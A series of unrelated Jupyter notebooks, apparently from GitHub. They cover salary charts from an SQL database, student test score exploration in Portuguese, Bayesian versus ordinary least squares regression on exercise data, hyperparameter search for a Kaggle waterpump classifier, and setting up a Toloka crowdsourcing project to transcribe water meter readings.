queryResults_df = queryResults_df.rename(columns={0:'Emp Number', 1:'Title ID', 2:'Birth Date',3:'First Name',4:'Last Name',5:'Gender',6:'Hire Date',7:'Title',8:'Salary'})
queryResults_df.head()
```
Create a histogram to visualize the most common salary ranges for employees.
```
salary=queryResults_df["Salary"]
plt.hist(salary)
plt.show()
plt.savefig("./Data Analysis/Images/SalaryHistogram.png")
print(sts.normaltest(salary.sample(50)))
# Demonstrate calculating measures of central tendency
mean_numpy = np.mean(salary)
print(f"The mean salary is {mean_numpy}")
median_numpy = np.median(salary)
print(f"The median salary is {median_numpy}")
mode_scipy = sts.mode(salary)
print(f"The mode salary is {mode_scipy}")
```
Create a bar chart of average salary by title.
```
connection = create_engine(connection_string).connect()
query = "select round(avg(s.salary)), t.title \
from employee e, salary s, title t \
where s.emp_no = e.emp_no and \
e.emp_title_id = t.title_id \
group by t.title"
queryResults2 = doQuery(query)
queryResults2_df = pd.DataFrame(queryResults2)
connection.close()
queryResults2_df = queryResults2_df.rename(columns={0:'Average Salary', 1:'Title'})
queryResults2_df
# Create a bar chart based upon the above data
average_salary=queryResults2_df['Average Salary']
x_axis = np.arange(len(average_salary))
plt.bar(x_axis, average_salary, color="b", align="center")
# Create the ticks for our bar chart's x axis
tick_locations = [value for value in x_axis]
plt.xticks(tick_locations, queryResults2_df['Title'], rotation=45)
# Create the ticks for our bar chart's x axis
tick_locations = [value for value in x_axis]
plt.xticks(tick_locations, queryResults2_df['Title'], rotation=45)
# Set the limits of the x axis
plt.xlim(-0.75, len(x_axis)-0.25)
plt.ylim(0, max(average_salary)+10000)
# Give the chart a title, x label, and y label
plt.title("Average Salary by Title")
plt.xlabel("Titles")
plt.ylabel("Average Salary")
plt.savefig("./Data Analysis/Images/AverageSalaryByTitle.png")
plt.show()
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/MarceloClaro/python-business/blob/gh-pages/Avaliar_o_desempenho_de_um_aluno_usando_t%C3%A9cnicas_de_Machine_Learning_e_python.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# **AVALIAÇÃO DO DESEMPENHO DE ALUNOS**
# Instalções de Bibliotecas em Python.
```
# Bibliotecas para algumas operações básicas
import numpy as np
import pandas as pd
```
### Biblioteca dabl tem que ser instalado no Colab
```
pip install git+https://github.com/amueller/dabl/
# Biblioteca para visualizações
import matplotlib.pyplot as plt
import seaborn as sns
import plotly.express as px
import dabl
```
###Para ler o conjunto de dados:
```
data = pd.read_csv("/content/Students.csv",encoding='ISO-8859-1')
# obtendo a forma dos dados
print(data.shape)
# (quantidades de linhas ou dados, quantidades de colinas ou categorias)
```
###Para olhar para os primeiros 30 registros no conjunto de dados
```
data.head(30)
```
###Estatísticas Descritivas
```
data.describe()
#count = Contagem total de linhas
#mean = Valor Médio
#std = Desvio Padrão
#min = Valor Mínimo
#25% = valor dos 25%
#50% = valor dos 50%
#75% = valor dos 75%
#max = Valor Máximo
```
###Vamos verificar o não de itens únicos presentes na coluna categórica.
```
data.select_dtypes('object').nunique()
```
###Vamos verificar a porcentagem de dados perdidos em cada coluna presente nos dados:
```
no_of_columns = data.shape[0]
percentage_of_missing_data = data.isnull().sum()/no_of_columns
print(percentage_of_missing_data)
```
###Para ver a comparação de todos os outros atributos em relação às marcas matemáticas.
```
plt.rcParams['figure.figsize'] = (18, 6)
plt.style.use('fivethirtyeight')
dabl.plot(data, target_col = 'math score')
```
###Comparação de todos os outros atributos em relação às marcas de leitura :
```
plt.rcParams['figure.figsize'] = (18, 6)
plt.style.use('fivethirtyeight')
dabl.plot(data, target_col = 'reading score')
```
###Vamos verificar o efeito do almoço na performance do aluno:
```
data[['lunch','gender','math score','writing score',
'reading score']].groupby(['lunch','gender']).agg('median')
```
###Vamos verificar o efeito do curso de preparação de testes em pontuações:
```
data[['test preparation course',
'gender',
'math score',
'writing score',
'reading score']].groupby(['test preparation course','gender']).agg('median')
```
# Visualizações de dados
### Visualizando o número de homens e mulheres no conjunto de dados
```
plt.rcParams['figure.figsize'] = (15, 5)
sns.countplot(data['gender'], palette = 'bone')
plt.title('Comparison of Males and Females', fontweight = 30)
plt.xlabel('Gender')
plt.ylabel('Count')
plt.show()
```
### Visualizando os diferentes grupos no conjunto de dados:
```
plt.rcParams['figure.figsize'] = (15, 9)
plt.style.use('ggplot')
sns.countplot(data['race/ethnicity'], palette = 'pink')
plt.title('Comparison of various groups', fontweight = 30, fontsize = 20)
plt.xlabel('Groups')
plt.ylabel('count')
plt.show()
```
###Visualizando os diferentes níveis de educação parental:
```
plt.rcParams['figure.figsize'] = (15, 9)
plt.style.use('fivethirtyeight')
sns.countplot(data['parental level of education'], palette = 'Blues')
plt.title('Comparison of Parental Education', fontweight = 30, fontsize = 20)
plt.xlabel('Degree')
plt.ylabel('count')
plt.show()
```
|
github_jupyter
|
# Basic Bayesian Linear Regression Implementation
```
# Pandas and numpy for data manipulation
import pandas as pd
import numpy as np
# Matplotlib and seaborn for visualization
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
# Linear Regression to verify implementation
from sklearn.linear_model import LinearRegression
# Scipy for statistics
import scipy
# PyMC3 for Bayesian Inference
import pymc3 as pm
```
# Load in Exercise Data
```
exercise = pd.read_csv('data/exercise.csv')
calories = pd.read_csv('data/calories.csv')
df = pd.merge(exercise, calories, on = 'User_ID')
df = df[df['Calories'] < 300]
df = df.reset_index()
df['Intercept'] = 1
df.head()
```
# Plot Relationship
```
plt.figure(figsize=(8, 8))
plt.plot(df['Duration'], df['Calories'], 'bo');
plt.xlabel('Duration (min)', size = 18); plt.ylabel('Calories', size = 18);
plt.title('Calories burned vs Duration of Exercise', size = 20);
# Create the features and response
X = df.loc[:, ['Intercept', 'Duration']]
y = df.ix[:, 'Calories']
```
# Implement Ordinary Least Squares Linear Regression by Hand
```
# Takes a matrix of features (with intercept as first column)
# and response vector and calculates linear regression coefficients
def linear_regression(X, y):
# Equation for linear regression coefficients
beta = np.matmul(np.matmul(np.linalg.inv(np.matmul(X.T, X)), X.T), y)
return beta
# Run the by hand implementation
by_hand_coefs = linear_regression(X, y)
print('Intercept calculated by hand:', by_hand_coefs[0])
print('Slope calculated by hand: ', by_hand_coefs[1])
xs = np.linspace(4, 31, 1000)
ys = by_hand_coefs[0] + by_hand_coefs[1] * xs
plt.figure(figsize=(8, 8))
plt.plot(df['Duration'], df['Calories'], 'bo', label = 'observations', alpha = 0.8);
plt.xlabel('Duration (min)', size = 18); plt.ylabel('Calories', size = 18);
plt.plot(xs, ys, 'r--', label = 'OLS Fit', linewidth = 3)
plt.legend(prop={'size': 16})
plt.title('Calories burned vs Duration of Exercise', size = 20);
```
## Prediction for Datapoint
```
print('Exercising for 15.5 minutes will burn an estimated {:.2f} calories.'.format(
by_hand_coefs[0] + by_hand_coefs[1] * 15.5))
```
# Verify with Scikit-learn Implementation
```
# Create the model and fit on the data
lr = LinearRegression()
lr.fit(X.Duration.reshape(-1, 1), y)
print('Intercept from library:', lr.intercept_)
print('Slope from library:', lr.coef_[0])
```
# Bayesian Linear Regression
### PyMC3 for Bayesian Inference
Implement MCMC to find the posterior distribution of the model parameters. Rather than a single point estimate of the model weights, Bayesian linear regression will give us a posterior distribution for the model weights.
## Model with 500 Observations
```
with pm.Model() as linear_model_500:
# Intercept
intercept = pm.Normal('Intercept', mu = 0, sd = 10)
# Slope
slope = pm.Normal('slope', mu = 0, sd = 10)
# Standard deviation
sigma = pm.HalfNormal('sigma', sd = 10)
# Estimate of mean
mean = intercept + slope * X.loc[0:499, 'Duration']
# Observed values
Y_obs = pm.Normal('Y_obs', mu = mean, sd = sigma, observed = y.values[0:500])
# Sampler
step = pm.NUTS()
# Posterior distribution
linear_trace_500 = pm.sample(1000, step)
```
## Model with all Observations
```
with pm.Model() as linear_model:
# Intercept
intercept = pm.Normal('Intercept', mu = 0, sd = 10)
# Slope
slope = pm.Normal('slope', mu = 0, sd = 10)
# Standard deviation
sigma = pm.HalfNormal('sigma', sd = 10)
# Estimate of mean
mean = intercept + slope * X.loc[:, 'Duration']
# Observed values
Y_obs = pm.Normal('Y_obs', mu = mean, sd = sigma, observed = y.values)
# Sampler
step = pm.NUTS()
# Posterior distribution
linear_trace = pm.sample(1000, step)
```
# Bayesian Model Results
The Bayesian Model provides more opportunities for interpretation than the ordinary least squares regression because it provides a posterior distribution. We can use this distribution to find the most likely single value as well as the entire range of likely values for our model parameters.
PyMC3 has many built in tools for visualizing and inspecting model runs. These let us see the distributions and provide estimates with a level of uncertainty, which should be a necessary part of any model.
## Trace of All Model Parameters
```
pm.traceplot(linear_trace, figsize = (12, 12));
```
## Posterior Distribution of Model Parameters
```
pm.plot_posterior(linear_trace, figsize = (12, 10), text_size = 20);
```
## Confidence Intervals for Model Parameters
```
pm.forestplot(linear_trace);
```
# Predictions of Response Sampled from the Posterior
We can now generate predictions of the linear regression line using the model results. The following plot shows 1000 different estimates of the regression line drawn from the posterior. The distribution of the lines gives an estimate of the uncertainty in the estimate. Bayesian Linear Regression has the benefit that it gives us a posterior __distribution__ rather than a __single point estimate__ in the frequentist ordinary least squares regression.
## All Observations
```
plt.figure(figsize = (8, 8))
pm.plot_posterior_predictive_glm(linear_trace, samples = 100, eval=np.linspace(2, 30, 100), linewidth = 1,
color = 'red', alpha = 0.8, label = 'Bayesian Posterior Fits',
lm = lambda x, sample: sample['Intercept'] + sample['slope'] * x);
plt.scatter(X['Duration'], y.values, s = 12, alpha = 0.8, c = 'blue', label = 'Observations')
plt.plot(X['Duration'], by_hand_coefs[0] + X['Duration'] * by_hand_coefs[1], 'k--', label = 'OLS Fit', linewidth = 1.4)
plt.title('Posterior Predictions with all Observations', size = 20); plt.xlabel('Duration (min)', size = 18);
plt.ylabel('Calories', size = 18);
plt.legend(prop={'size': 16});
pm.df_summary(linear_trace)
```
## Limited Observations
```
plt.figure(figsize = (8, 8))
pm.plot_posterior_predictive_glm(linear_trace_500, samples = 100, eval=np.linspace(2, 30, 100), linewidth = 1,
color = 'red', alpha = 0.8, label = 'Bayesian Posterior Fits',
lm = lambda x, sample: sample['Intercept'] + sample['slope'] * x);
plt.scatter(X['Duration'][:500], y.values[:500], s = 12, alpha = 0.8, c = 'blue', label = 'Observations')
plt.plot(X['Duration'], by_hand_coefs[0] + X['Duration'] * by_hand_coefs[1], 'k--', label = 'OLS Fit', linewidth = 1.4)
plt.title('Posterior Predictions with Limited Observations', size = 20); plt.xlabel('Duration (min)', size = 18);
plt.ylabel('Calories', size = 18);
plt.legend(prop={'size': 16});
pm.df_summary(linear_trace_500)
```
# Specific Prediction for One Datapoint
```
bayes_prediction = linear_trace['Intercept'] + linear_trace['slope'] * 15.5
plt.figure(figsize = (8, 8))
plt.style.use('fivethirtyeight')
sns.kdeplot(bayes_prediction, label = 'Bayes Posterior Prediction')
plt.vlines(x = by_hand_coefs[0] + by_hand_coefs[1] * 15.5,
ymin = 0, ymax = 2.5,
label = 'OLS Prediction',
colors = 'red', linestyles='--')
plt.legend();
plt.xlabel('Calories Burned', size = 18), plt.ylabel('Probability Density', size = 18);
plt.title('Posterior Prediction for 15.5 Minutes', size = 20);
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/hoops92/DS-Unit-2-Kaggle-Challenge/blob/master/module3-cross-validation/Scott_LS_DS10_223_assignment.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
Lambda School Data Science
*Unit 2, Sprint 2, Module 3*
---
# Cross-Validation
## Assignment
- [ ] [Review requirements for your portfolio project](https://lambdaschool.github.io/ds/unit2), then submit your dataset.
- [ ] Continue to participate in our Kaggle challenge.
- [ ] Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.
- [ ] Submit your predictions to our Kaggle competition. (Go to our Kaggle InClass competition webpage. Use the blue **Submit Predictions** button to upload your CSV file. Or you can use the Kaggle API to submit your predictions.)
- [ ] Commit your notebook to your fork of the GitHub repo.
You won't be able to just copy from the lesson notebook to this assignment.
- Because the lesson was ***regression***, but the assignment is ***classification.***
- Because the lesson used [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html), which doesn't work as-is for _multi-class_ classification.
So you will have to adapt the example, which is good real-world practice.
1. Use a model for classification, such as [RandomForestClassifier](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html)
2. Use hyperparameters that match the classifier, such as `randomforestclassifier__ ...`
3. Use a metric for classification, such as [`scoring='accuracy'`](https://scikit-learn.org/stable/modules/model_evaluation.html#common-cases-predefined-values)
4. If you’re doing a multi-class classification problem — such as whether a waterpump is functional, functional needs repair, or nonfunctional — then use a categorical encoding that works for multi-class classification, such as [OrdinalEncoder](https://contrib.scikit-learn.org/categorical-encoding/ordinal.html) (not [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html))
## Stretch Goals
### Reading
- Jake VanderPlas, [Python Data Science Handbook, Chapter 5.3](https://jakevdp.github.io/PythonDataScienceHandbook/05.03-hyperparameters-and-model-validation.html), Hyperparameters and Model Validation
- Jake VanderPlas, [Statistics for Hackers](https://speakerdeck.com/jakevdp/statistics-for-hackers?slide=107)
- Ron Zacharski, [A Programmer's Guide to Data Mining, Chapter 5](http://guidetodatamining.com/chapter5/), 10-fold cross validation
- Sebastian Raschka, [A Basic Pipeline and Grid Search Setup](https://github.com/rasbt/python-machine-learning-book/blob/master/code/bonus/svm_iris_pipeline_and_gridsearch.ipynb)
- Peter Worcester, [A Comparison of Grid Search and Randomized Search Using Scikit Learn](https://blog.usejournal.com/a-comparison-of-grid-search-and-randomized-search-using-scikit-learn-29823179bc85)
### Doing
- Add your own stretch goals!
- Try other [categorical encodings](https://contrib.scikit-learn.org/categorical-encoding/). See the previous assignment notebook for details.
- In additon to `RandomizedSearchCV`, scikit-learn has [`GridSearchCV`](https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html). Another library called scikit-optimize has [`BayesSearchCV`](https://scikit-optimize.github.io/notebooks/sklearn-gridsearchcv-replacement.html). Experiment with these alternatives.
- _[Introduction to Machine Learning with Python](http://shop.oreilly.com/product/0636920030515.do)_ discusses options for "Grid-Searching Which Model To Use" in Chapter 6:
> You can even go further in combining GridSearchCV and Pipeline: it is also possible to search over the actual steps being performed in the pipeline (say whether to use StandardScaler or MinMaxScaler). This leads to an even bigger search space and should be considered carefully. Trying all possible solutions is usually not a viable machine learning strategy. However, here is an example comparing a RandomForestClassifier and an SVC ...
The example is shown in [the accompanying notebook](https://github.com/amueller/introduction_to_ml_with_python/blob/master/06-algorithm-chains-and-pipelines.ipynb), code cells 35-37. Could you apply this concept to your own pipelines?
### BONUS: Stacking!
Here's some code you can use to "stack" multiple submissions, which is another form of ensembling:
```python
import pandas as pd
# Filenames of your submissions you want to ensemble
files = ['submission-01.csv', 'submission-02.csv', 'submission-03.csv']
target = 'status_group'
submissions = (pd.read_csv(file)[[target]] for file in files)
ensemble = pd.concat(submissions, axis='columns')
majority_vote = ensemble.mode(axis='columns')[0]
sample_submission = pd.read_csv('sample_submission.csv')
submission = sample_submission.copy()
submission[target] = majority_vote
submission.to_csv('my-ultimate-ensemble-submission.csv', index=False)
```
```
%%capture
import sys
# If you're on Colab:
if 'google.colab' in sys.modules:
DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'
!pip install category_encoders==2.*
# If you're working locally:
else:
DATA_PATH = '../data/'
import pandas as pd
# Merge train_features.csv & train_labels.csv
train = pd.merge(pd.read_csv(DATA_PATH+'waterpumps/train_features.csv'),
pd.read_csv(DATA_PATH+'waterpumps/train_labels.csv'))
# Read test_features.csv & sample_submission.csv
test = pd.read_csv(DATA_PATH+'waterpumps/test_features.csv')
sample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')
```
## Define a function to wrangle train, validate, and test sets in the same way. Clean outliers and engineer features.
```
import numpy as np
def wrangle(X):
"""Wrangle train, validate, and test sets in the same way"""
# Prevent SettingWithCopyWarning
X = X.copy()
# About 3% of the time, latitude has small values near zero,
# outside Tanzania, so we'll treat these values like zero.
X['latitude'] = X['latitude'].replace(-2e-08, 0)
# When columns have zeros and shouldn't, they are like null values.
# So we will replace the zeros with nulls, and impute missing values later.
cols_with_zeros = ['longitude', 'latitude', 'construction_year',
'gps_height','population','amount_tsh']
for col in cols_with_zeros:
X[col] = X[col].replace(0, np.nan)
X[col+'_MISSING'] = X[col].isnull()
# Approximate distance from 'Null Island'
X['distance'] = ((X['latitude']+10.99846435)**2 + (X['longitude']-19.6071219)**2)**.5
# Convert to datetime and create year_ month_ & day_recorded
X['date_recorded'] = pd.to_datetime(X['date_recorded'], infer_datetime_format=True)
X['year_recorded'] = X['date_recorded'].dt.year
X['month_recorded'] = X['date_recorded'].dt.month
X['day_recorded'] = X['date_recorded'].dt.day
X = X.drop(columns='date_recorded')
# Engineer feature: how many years from construction_year to date_recorded
X['years'] = X['year_recorded'] - X['construction_year']
X['years_MISSING'] = X['years'].isnull()
# region_code & district_code are numeric columns, but should be categorical features,
# so convert it from a number to a string
X['region_code'] = X['region_code'].astype(str)
X['district_code'] = X['district_code'].astype(str)
# quantity & quantity_group are duplicates, so drop one
X = X.drop(columns='quantity_group')
# source, source_class & source_type are almost identical.
# source has higher level of detail.
X = X.drop(columns=['source_class','source_type'])
# recorded_by has single value, so drop.
X = X.drop(columns='recorded_by')
X = X.drop(columns='id')
# water_quality & quality_group are almost identical.
# water_quality has higher level of detail.
X = X.drop(columns='quality_group')
# waterpoint_type & waterpoint_type_group are almost identical.
# waterpoint_type has higher level of detail.
X = X.drop(columns='waterpoint_type_group')
# payment & payment_type are duplicates, so drop one
X = X.drop(columns='payment_type')
# extraction_type, extraction_type_class & extraction_type_group are almost identical.
# extraction_type has higher level of detail.
X = X.drop(columns=['extraction_type_class','extraction_type_group'])
# installer & funder are almost identical.
# funder has higher level of detail.
X = X.drop(columns='installer')
# management & management_group are almost identical.
# management has higher level of detail.
X = X.drop(columns='management_group')
# region_code & region are almost identical.
# region_code has higher level of detail.
X = X.drop(columns='region')
# return the wrangled dataframe
return X
train = wrangle(train)
test = wrangle(test)
```
## Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.
```
pip install category_encoders
import category_encoders as ce
from sklearn.impute import SimpleImputer
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import make_pipeline
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import RandomizedSearchCV
from scipy.stats import randint, uniform
%%time
target = 'status_group'
features = train.columns.drop(target)
X_train = train[features]
y_train = train[target]
pipeline = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(strategy='median'),
RandomForestClassifier(n_estimators=100, max_depth=22, n_jobs=-1, random_state=42)
)
k = 5
scores = cross_val_score(pipeline, X_train, y_train, cv=k,
scoring='accuracy')
print(f'Accuracy for {k} folds:', scores)
%%time
target = 'status_group'
features = train.columns.drop(target)
X_train = train[features]
y_train = train[target]
# y_train_pre = train[target]
# # Encode target feature, in order to use encoders like Target Encoder
# encoder = ce.OrdinalEncoder()
# y_train = encoder.fit_transform(y_train_pre)
pipeline = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(strategy='median'),
RandomForestClassifier(n_estimators=100, max_depth=22, n_jobs=-1, random_state=42)
)
param_distributions = {
# 'targetencoder__min_samples_leaf': randint(1, 15),
# 'targetencoder__smoothing': uniform(1, 50),
# 'simpleimputer__strategy': ['mean', 'median'],
# 'randomforestclassifier__n_estimators': randint(80, 120),
# 'randomforestclassifier__max_depth': range(16, 24),
'randomforestclassifier__max_features': uniform(0.2, 0.8),
'randomforestclassifier__criterion': ['gini', 'entropy'],
}
# If you're on Colab, decrease n_iter & cv parameters
search = RandomizedSearchCV(
pipeline,
param_distributions=param_distributions,
n_iter=10,
cv=5,
scoring='accuracy',
verbose=10,
return_train_score=True,
n_jobs=-1
)
search.fit(X_train, y_train);
print('Best hyperparameters', search.best_params_)
print('Cross-validation Accuracy', search.best_score_)
pd.DataFrame(search.cv_results_).sort_values(by='rank_test_score').T
```
## Submit your predictions to DS10 Kaggle competition.
```
pipeline = search.best_estimator_
y_pred = pipeline.predict(test)
# Makes a dataframe with two columns, id and status_group,
# and writes to a csv file, without the index
# sample_submission = pd.read_csv('sample_submission.csv')
submission = sample_submission.copy()
submission['status_group'] = y_pred
submission.to_csv('your-submission-filename.csv', index=False)
# from google.colab import files
# files.download('your-submission-filename.csv')
```
|
github_jupyter
|
# Text recognition
We have a set of water meter images. We need to get each water meter’s readings. We ask performers to look at the images and write down the digits on each water meter.
To get acquainted with Toloka tools for free, you can use the promo code **TOLOKAKIT1** on $20 on your [profile page](https://toloka.yandex.com/requester/profile?utm_source=github&utm_medium=site&utm_campaign=tolokakit) after registration.
Prepare environment and import all we'll need.
```
!pip install toloka-kit==0.1.15
!pip install crowd-kit==0.0.7
!pip install ipyplot
import datetime
import os
import sys
import time
import logging
import ipyplot
import pandas
import numpy as np
import toloka.client as toloka
import toloka.client.project.template_builder as tb
from crowdkit.aggregation import ROVER
logging.basicConfig(
format='[%(levelname)s] %(name)s: %(message)s',
level=logging.INFO,
stream=sys.stdout,
)
```
Сreate toloka-client instance. All api calls will go through it. More about OAuth token in our [Learn the basics example](https://github.com/Toloka/toloka-kit/tree/main/examples/0.getting_started/0.learn_the_basics) [](https://colab.research.google.com/github/Toloka/toloka-kit/blob/main/examples/0.getting_started/0.learn_the_basics/learn_the_basics.ipynb)
```
toloka_client = toloka.TolokaClient(input("Enter your token:"), 'PRODUCTION') # Or switch to 'SANDBOX'
logging.info(toloka_client.get_requester())
```
## Creating new project
Enter a clear project name and description.
> The project name and description will be visible to the performers.
```
project = toloka.Project(
public_name='Write down the digits in an image',
public_description='Look at the image and write down the digits shown on the water meter.',
)
```
Create task interface.
- Read about configuring the [task interface](https://toloka.ai/docs/guide/reference/interface-spec.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.
- Check the [Interfaces section](https://toloka.ai/knowledgebase/interface?utm_source=github&utm_medium=site&utm_campaign=tolokakit) of our Knowledge Base for more tips on interface design.
- Read more about the [Template builder](https://toloka.ai/docs/template-builder/index.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.
```
header_viewer = tb.MarkdownViewV1("""1. Look at the image
2. Find boxes with the numbers
3. Write down the digits in black section. (Put '0' if there are no digits there)
4. Put '.'
5. Write down the digits in red section""")
image_viewer = tb.ImageViewV1(tb.InputData('image_url'), rotatable=True)
output_field = tb.TextFieldV1(
tb.OutputData('value'),
label='Write down the digits. Format: 365.235',
placeholder='Enter value',
hint="Make sure your format of number is '365.235' or '0.112'",
validation=tb.SchemaConditionV1(
schema={
'type': 'string',
'pattern': r'^\d+\.?\d{0,3}$',
'minLength': 1,
'maxLength': 9,
}
)
)
task_width_plugin = tb.TolokaPluginV1('scroll', task_width=600)
project_interface = toloka.project.TemplateBuilderViewSpec(
view=tb.ListViewV1([header_viewer, image_viewer, output_field]),
plugins=[task_width_plugin],
)
```
Set data specification. And set task interface to project.
> Specifications are a description of input data that will be used in a project and the output data that will be collected from the performers.
Read more about [input and output data specifications](https://yandex.ru/support/toloka-tb/operations/create-specs.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.
```
input_specification = {'image_url': toloka.project.UrlSpec()}
output_specification = {'value': toloka.project.StringSpec()}
project.task_spec = toloka.project.task_spec.TaskSpec(
input_spec=input_specification,
output_spec=output_specification,
view_spec=project_interface,
)
```
Write short and clear instructions.
> Though the task itself is simple, be sure to add examples for non-obvious cases (like when there are no red digits on an image). This helps to eliminate noise in the labels.
Get more tips on designing [instructions](https://toloka.ai/knowledgebase/instruction?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base.
```
project.public_instructions = """This task is to solve machine learning problem of digit recognition on the image.<br>
The more precise you read the information from the image the more precise would be algorithm<br>
Your contribution here is to get exact information even if there are any complicated and uncertain cases.<br>
We hope for your skills to solve one of the important science problem.<br><br>
<b>Basic steps:</b><br>
<ul><li>Look at the image and find meter with the numbers in the boxes</li>
<li>Find black numbers/section and red numbers/section</li>
<li>Put black and red numbers separated with '.' to text field</li></ul>"""
```
Create a project.
```
project = toloka_client.create_project(project)
```
## Preparing data
This example uses [Toloka WaterMeters](https://toloka.ai/datasets?utm_source=github&utm_medium=site&utm_campaign=tolokakit) dataset collected by Roman Kucev.
```
!curl https://s3.mds.yandex.net/tlk/dataset/TlkWaterMeters/data.tsv --output data.tsv
raw_dataset = pandas.read_csv('data.tsv', sep='\t', dtype={'value': 'str'})
raw_dataset = raw_dataset[['image_url', 'value']]
with pandas.option_context("max_colwidth", 100):
display(raw_dataset)
```
Lets look at the images from this dataset:
<table align="center">
<tr>
<td>
<img src="https://tlk.s3.yandex.net/dataset/TlkWaterMeters/images/id_53_value_595_825.jpg" alt="value 595.825">
</td>
<td>
<img src="https://tlk.s3.yandex.net/dataset/TlkWaterMeters/images/id_553_value_65_475.jpg" alt="value 65.475">
</td>
<td>
<img src="https://tlk.s3.yandex.net/dataset/TlkWaterMeters/images/id_407_value_21_86.jpg" alt="value 21.860">
</td>
</tr>
<tr><td align="center" colspan="3">
<b>Figure 1.</b> Images from dataset
</td></tr>
</table>
Split this dataset into three parts
- Training tasks - we'll put them into training. This type of task must contain ground truth and hint about how to perform it.
- Golden tasks - we'll put it into the regular pool. This type of task must contain ground truth.
- Regular tasks - for regular pool. Only image url as input.
```
raw_dataset = raw_dataset.sample(frac=1).reset_index(drop=True)
training_dataset, golden_dataset, main_dataset, _ = np.split(raw_dataset, [10, 20, 120], axis=0)
print(f'training_dataset - {len(training_dataset)}')
print(f'golden_dataset - {len(golden_dataset)}')
print(f'main_dataset - {len(main_dataset)}')
```
## Create a training pool
> Training is an essential part of almost every crowdsourcing project. It allows you to select performers who have really mastered the task, and thus improve quality. Training is also a great tool for scaling your task because you can run it any time you need new performers.
Read more about [selecting performers](https://toloka.ai/knowledgebase/quality-control?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base.
```
training = toloka.Training(
project_id=project.id,
private_name='Text recognition training',
may_contain_adult_content=False,
assignment_max_duration_seconds=60*10,
mix_tasks_in_creation_order=False,
shuffle_tasks_in_task_suite=False,
training_tasks_in_task_suite_count=2,
task_suites_required_to_pass=5,
retry_training_after_days=5,
inherited_instructions=True,
)
training = toloka_client.create_training(training)
```
Upload training tasks to the pool.
> It’s important to include examples for all сases in the training. Make sure the training set is balanced and the comments explain why an answer is correct. Don’t just name the correct answers.
```
training_tasks = [
toloka.Task(
pool_id=training.id,
input_values={'image_url': row.image_url},
known_solutions = [toloka.task.BaseTask.KnownSolution(output_values={'value': row.value})],
message_on_unknown_solution=f'Black section is {row.value.split(".")[0]}. Red section is {row.value.split(".")[1]}.',
)
for row in training_dataset.itertuples()
]
result = toloka_client.create_tasks(training_tasks, allow_defaults=True)
print(len(result.items))
```
## Create the main pool
A pool is a set of paid tasks grouped into task pages. These tasks are sent out for completion at the same time.
> All tasks within a pool have the same settings (price, quality control, etc.)
```
pool = toloka.Pool(
project_id=project.id,
# Give the pool any convenient name. You are the only one who will see it.
private_name='Write down the digits in an image.',
may_contain_adult_content=False,
# Set the price per task page.
reward_per_assignment=0.02,
will_expire=datetime.datetime.utcnow() + datetime.timedelta(days=365),
# Overlap. This is the number of users who will complete the same task.
defaults=toloka.Pool.Defaults(default_overlap_for_new_task_suites=3),
# Time allowed for completing a task page
assignment_max_duration_seconds=600,
)
```
- Read more about [pricing principles](https://toloka.ai/knowledgebase/pricing?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base.
- To understand [how overlap works](https://toloka.ai/docs/guide/concepts/mvote.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit), go to the Requester’s Guide.
- To understand how much time it should take to complete a task suite, try doing it yourself.
Attach the training you created earlier and select the accuracy level that is required to reach the main pool.
```
pool.set_training_requirement(training_pool_id=training.id, training_passing_skill_value=75)
```
Select English-speaking performers
```
pool.filter = toloka.filter.Languages.in_('EN')
```
Set up [Quality control](https://toloka.ai/docs/guide/concepts/control.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit). Ban performers who give incorrect responses to control tasks.
> Since tasks such as these have an answer that can be used as ground truth, we can use standard quality control rules like golden sets.
Read more about [quality control principles](https://toloka.ai/knowledgebase/quality-control?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base or check out [control tasks settings](https://toloka.ai/docs/guide/concepts/goldenset.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.
```
pool.quality_control.add_action(
collector=toloka.collectors.GoldenSet(),
conditions=[
toloka.conditions.GoldenSetCorrectAnswersRate < 80.0,
toloka.conditions.GoldenSetAnswersCount >= 3
],
action=toloka.actions.RestrictionV2(
scope='PROJECT',
duration=2,
duration_unit='DAYS',
private_comment='Control tasks failed'
)
)
pool.quality_control.add_action(
collector=toloka.collectors.AssignmentSubmitTime(history_size=5, fast_submit_threshold_seconds=7),
conditions=[toloka.conditions.FastSubmittedCount >= 1],
action=toloka.actions.RestrictionV2(
scope='PROJECT',
duration=2,
duration_unit='DAYS',
private_comment='Fast response'
))
```
Specify the number of tasks per page. For example: 3 main tasks and 1 control task.
> We recommend putting as many tasks on one page as a performer can complete in 1 to 5 minutes. That way, performers are less likely to get tired, and they won’t lose a significant amount of data if a technical issue occurs.
To learn more about [grouping tasks](https://toloka.ai/docs/search/?utm_source=github&utm_medium=site&utm_campaign=tolokakit&query=smart+mixing) into suites, read the Requester’s Guide.
```
pool.set_mixer_config(
real_tasks_count=3,
golden_tasks_count=1
)
```
Create pool
